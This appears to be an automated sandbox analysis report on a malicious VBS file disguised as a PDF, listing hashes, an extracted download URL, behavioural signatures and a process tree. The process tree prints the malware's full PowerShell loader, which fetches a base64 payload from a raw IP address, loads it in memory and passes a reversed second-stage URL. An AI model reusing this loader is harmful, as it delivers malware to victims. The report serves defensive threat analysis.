Analysis
-
max time kernel
215s -
max time network
291s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-11-2022 14:40
Static task
static1
Behavioral task
behavioral1
Sample
TW03GBVSFS0PDHS_001_PDF.vbs
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
TW03GBVSFS0PDHS_001_PDF.vbs
Resource
win10v2004-20221111-en
General
-
Target
TW03GBVSFS0PDHS_001_PDF.vbs
-
Size
209KB
-
MD5
4a83206f2fe5b8c48d5fca63c420908c
-
SHA1
a2b534aa07ebaa3b452a1f4a9b05b6cd1b2c842f
-
SHA256
d88fc6590c4f50373cce292ca245fa77c0a3cecbab48564b8ef70c1051aa0aa6
-
SHA512
14e8a5a6f52bd2a5febe14669b242a38dc75567898e82c5bcaf3d3ef6173eecc14a486e9a4e9055bd55592d28eff24e6691dd7c41f3063ee679d56376caa0859
-
SSDEEP
96:i5fU56Igx1Ua7fLhwMwQgI5mPZFotzeSx8iamzdtaP1joXGhsS0:yfU0Igx1Ua7fLhwMwrI8PLotzeSx8i7Z
Malware Config
Extracted
http://4.204.233.44/Dll/Dll.ppam
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2971393436-602173351-1645505021-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4516 powershell.exe 4516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4516 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
WScript.exedescription pid process target process PID 3240 wrote to memory of 4516 3240 WScript.exe powershell.exe PID 3240 wrote to memory of 4516 3240 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TW03GBVSFS0PDHS_001_PDF.vbs"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3240 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://4.204.233.44/Dll/Dll.ppam'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('6ff9921f9d0d-2e39-a324-1bf0-c9100279=nekot&aidem=tla?txt.61ufs/o/moc.topsppa.de23d-1cjj/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth'))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4516